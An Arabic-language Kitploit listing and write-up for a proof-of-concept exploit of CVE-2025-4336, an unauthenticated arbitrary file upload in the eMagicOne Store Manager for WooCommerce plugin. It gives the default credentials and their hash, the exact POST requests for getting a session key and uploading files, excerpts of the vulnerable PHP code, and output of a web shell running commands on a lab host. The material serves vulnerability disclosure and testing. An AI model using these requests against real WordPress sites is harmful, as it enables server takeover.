Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4336 — مدير متجر eMagicOne لـ WooCommerce <= 1.2.5 - رفع ملف تعسفي غير مصادق عبر مهمة set_file | Kitploit
أدوات/GitHubGitHub/d0n601/cve-2025-4336
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubd0n601/cve-2025-4336

CVE-2025-4336

مدير متجر eMagicOne لـ WooCommerce <= 1.2.5 - رفع ملف تعسفي غير مصادق عبر مهمة set_file

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

eMagicOne Store Manager for WooCommerce <= 1.2.5 - رفع ملف تعسفي عبر مهمة set_file

يكشف الإضافة eMagicOne Store Manager for WooCommerce عن نقطة نهاية بروتوكول إدارة عن بعد (?connector=bridge) تسمح برفع الملفات إلى الخادم. تعتمد آلية المصادقة على زوج افتراضي من بيانات الاعتماد (login=1, password=1) ونظام مفتاح الجلسة. إذا لم يتم تغيير بيانات الاعتماد الافتراضية، يمكن للمهاجم بسهولة المصادقة، والحصول على مفتاح جلسة، ورفع ملفات تعسفية (بما في ذلك صدفات PHP) إلى جذر WordPress أو أي دليل قابل للكتابة.

إعادة الإنتاج

  • يتم توفير نموذج إثبات المفهوم (POC) cve-2025-4336.py لإظهار مهاجم عن بعد يقوم برفع قشرة ويب وتنفيذها باسم shell.php عبر آلية المصادقة الافتراضية، وتنفيذ كود عن بعد:
root@kitploit:~
python3 exploit.py https://lab1.hacker   
[*] Requesting session key...
[*] Raw response: {"response_code":20,"revision":11,"module_version":"1.2.5","session_key":"6f46bc8b67b1c8f0dc871bcec9e162c1d43f047e5c46aec7d7fdf48d8c17ed69"}
[+] Got session key: 6f46bc8b67b1c8f0dc871bcec9e162c1d43f047e5c46aec7d7fdf48d8c17ed69
[*] Uploading file...
[*] Upload response: {"response_code":20,"message":"File was successfully uploaded"}
[*] Executing Web Shell Commands...
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 23576sec preferred_lft 23576sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86363sec preferred_lft 14363sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:ef:a9:95:6a brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

التدفق الضعيف

بيانات الاعتماد الافتراضية وحساب التجزئة

عند تنشيط الإضافة، يتم تعيين الثوابت التالية في smconnector.php:

root@kitploit:~
define( 'EMO_SMC_DEFAULT_LOGIN', '1' );
define( 'EMO_SMC_DEFAULT_PASSWORD', '1' );

التجزئة الافتراضية المستخدمة للمصادقة هي:

root@kitploit:~
'smconnector_hash'   => md5( EMO_SMC_DEFAULT_LOGIN . EMO_SMC_DEFAULT_PASSWORD ),

النتيجة: التجزئة الافتراضية هي md5('1' . '1') = c4ca4238a0b923820dcc509a6f75849b.

الحصول على مفتاح الجلسة

يتم الحصول على مفتاح الجلسة عن طريق إرسال طلب POST إلى نقطة نهاية الجسر مع التجزئة ومهمة (مثل get_version):

root@kitploit:~
POST /?connector=bridge
Content-Type: application/x-www-form-urlencoded

hash=c4ca4238a0b923820dcc509a6f75849b&task=get_version

الكود ذو الصلة:
classes/class-emosmconnectorcommon.php (السطور ~441-525):

root@kitploit:~
private function check_auth() {
    if ( $this->shop_cart->isset_request_param( 'key' ) ) {
        // ... التحقق من مفتاح الجلسة ...
    } elseif ( $this->shop_cart->isset_request_param( 'hash' ) ) {
        $hash = (string) $this->shop_cart->get_request_param( 'hash' );
        if ( ! $this->is_hash_valid( $hash ) ) {
            // ... خطأ ...
        }
        $key = $this->generate_session_key( $hash );
        // ... إرجاع مفتاح الجلسة ...
    }
}

تخزين مفتاح الجلسة

يتم تخزين مفتاح الجلسة في جدول wp_smconnector_session_keys:

root@kitploit:~
private function generate_session_key( $hash ) {
    $key = hash( 'sha256', $hash . $timestamp );
    $sql = 'INSERT INTO `' . self::TABLE_SESSION_KEYS
        . "` (`session_key`, `date_added`, `last_activity`) VALUES ('" . $this->shop_cart->p_sql( $key ) . "', '"
        . $date . "', '" . $date . "')";
    $this->shop_cart->exec_sql( $sql );
    return $key;
}

رفع ملف تعسفي

باستخدام مفتاح جلسة صالح، يمكن للمهاجم رفع ملف باستخدام مهمة set_file:

root@kitploit:~
POST /?connector=bridge&task=set_file&key=<session_key>&entity_type=.&filename=hello.txt
Content-Type: multipart/form-data

[email protected];type=text/plain

الكود ذو الصلة:
classes/class-emosmconnectorcommon.php (السطور ~2250+):

root@kitploit:~
private function set_file() {
    // ... فحص المعاملات ...
    if ( ! $this->shop_cart->set_file( $entity_type, $filename, self::UPLOAD_FILE_NAME ) ) {
        $this->generate_error( $this->br_errors['upload_file_error'] );
    }
}

classes/class-emosmcwoocommerceoverrider.php (السطور ~440+):

root@kitploit:~
public function set_file( $folder, $filename, $file ) {
    $destination_path = $this->get_shop_root_dir() . "$folder/$filename";
    if ( isset( $_FILES[ $file ]['tmp_name'] ) ) {
        $tmp_name = sanitize_text_field( $_FILES[ $file ]['tmp_name'] );
        $result = move_uploaded_file( $tmp_name, $destination_path );
    }
    if ( $result ) {
        die(json_encode(array(self::CODE_RESPONSE => self::SUCCESSFUL, self::KEY_MESSAGE => 'File was successfully uploaded')));
    }
}

النتيجة: يتم كتابة الملف إلى جذر WordPress (أو أي دليل محدد).

تنزيل الأداة